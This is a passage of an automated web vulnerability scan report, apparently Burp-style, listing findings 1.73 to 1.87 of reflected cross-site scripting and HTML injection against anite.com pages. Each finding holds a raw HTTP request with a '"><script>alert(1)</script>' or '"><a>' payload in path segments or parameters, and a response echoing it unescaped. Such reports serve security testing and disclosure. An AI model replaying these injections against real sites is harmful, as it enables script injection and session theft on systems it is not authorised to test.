Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-us-travel-100/website-information/anite-travel-systems.html?Itemid=415bccab"><a>cd9f07ed8a8#up">
...[SNIP]...

1.73. http://anite.com/contact-us-travel-100/website-information/anite-travel-systems.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/contact-us-travel-100/website-information/anite-travel-systems.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee5a"><script>alert(1)</script>abe6434f78c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us-travel-1006ee5a"><script>alert(1)</script>abe6434f78c/website-information/anite-travel-systems.html HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-us-travel-1006ee5a"><script>alert(1)</script>abe6434f78c/website-information/anite-travel-systems.html#up">
...[SNIP]...

1.74. http://anite.com/contact-us-travel-100/website-information/anite-travel-systems.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/contact-us-travel-100/website-information/anite-travel-systems.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e90f"><script>alert(1)</script>b4c1c74c213 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us-travel-100/website-information2e90f"><script>alert(1)</script>b4c1c74c213/anite-travel-systems.html HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-us-travel-100/website-information2e90f"><script>alert(1)</script>b4c1c74c213/anite-travel-systems.html#up">
...[SNIP]...

1.75. http://anite.com/contact-us-travel-100/website-information/anite-travel-systems.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/contact-us-travel-100/website-information/anite-travel-systems.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78ba5"><script>alert(1)</script>fcb88d37dbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us-travel-100/website-information/78ba5"><script>alert(1)</script>fcb88d37dbb HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-us-travel-100/website-information/78ba5"><script>alert(1)</script>fcb88d37dbb#up">
...[SNIP]...

1.76. http://anite.com/contact-us-travel-100/website-information/anite-travel-systems.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/contact-us-travel-100/website-information/anite-travel-systems.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a09fe"><a>03c32b77749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact-us-travel-100/website-information/anite-travel-systems.html?a09fe"><a>03c32b77749=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-us-travel-100/website-information/anite-travel-systems.html?a09fe"><a>03c32b77749=1#up">
...[SNIP]...

1.77. http://anite.com/cruise-operator-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/cruise-operator-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c894"><script>alert(1)</script>69f5a1b474a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4c894"><script>alert(1)</script>69f5a1b474a HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/4c894"><script>alert(1)</script>69f5a1b474a#up">
...[SNIP]...

1.78. http://anite.com/cruise-operator-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/cruise-operator-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99888"><a>dce32b48ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cruise-operator-software.html?99888"><a>dce32b48ab7=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/cruise-operator-software.html?99888"><a>dce32b48ab7=1#up">
...[SNIP]...

1.79. http://anite.com/current-vacancies.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/current-vacancies.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf843"><a>4a25556c70c was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /current-vacancies.html?Itemid=478bf843"><a>4a25556c70c HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/current-vacancies.html?Itemid=478bf843"><a>4a25556c70c#up">
...[SNIP]...

1.80. http://anite.com/current-vacancies.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/current-vacancies.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5cb4"><script>alert(1)</script>e4cd4e4fe80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b5cb4"><script>alert(1)</script>e4cd4e4fe80 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/b5cb4"><script>alert(1)</script>e4cd4e4fe80#up">
...[SNIP]...

1.81. http://anite.com/current-vacancies.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/current-vacancies.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce875"><a>feb80fb81ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /current-vacancies.html?ce875"><a>feb80fb81ba=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/current-vacancies.html?ce875"><a>feb80fb81ba=1#up">
...[SNIP]...

1.82. http://anite.com/data/panel_single.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/data/panel_single.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82b32"><script>alert(1)</script>92d356f58fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/82b32"><script>alert(1)</script>92d356f58fd HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/anite_homepage03.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmb=188041464; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:08:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30263

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/data/82b32"><script>alert(1)</script>92d356f58fd#up">
...[SNIP]...

1.83. http://anite.com/drive-testing-nemo.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/drive-testing-nemo.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f53a"><a>721c47d3647 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /drive-testing-nemo.html?Itemid=4479f53a"><a>721c47d3647 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/drive-testing-nemo.html?Itemid=4479f53a"><a>721c47d3647#up">
...[SNIP]...

1.84. http://anite.com/drive-testing-nemo.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/drive-testing-nemo.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd7bd"><script>alert(1)</script>78efc5b387a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bd7bd"><script>alert(1)</script>78efc5b387a HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/bd7bd"><script>alert(1)</script>78efc5b387a#up">
...[SNIP]...

1.85. http://anite.com/drive-testing-nemo.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/drive-testing-nemo.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b336"><a>68794bf2559 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /drive-testing-nemo.html?3b336"><a>68794bf2559=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/drive-testing-nemo.html?3b336"><a>68794bf2559=1#up">
...[SNIP]...

1.86. http://anite.com/ferry-operator-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/ferry-operator-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba2c"><script>alert(1)</script>7ede6de04b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8ba2c"><script>alert(1)</script>7ede6de04b7 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/8ba2c"><script>alert(1)</script>7ede6de04b7#up">
...[SNIP]...

1.87. http://anite.com/ferry-operator-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/ferry-operator-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fc48"><a>0c9ee632b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ferry-operator-software.html?2fc48"><a>0c9ee632b31=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
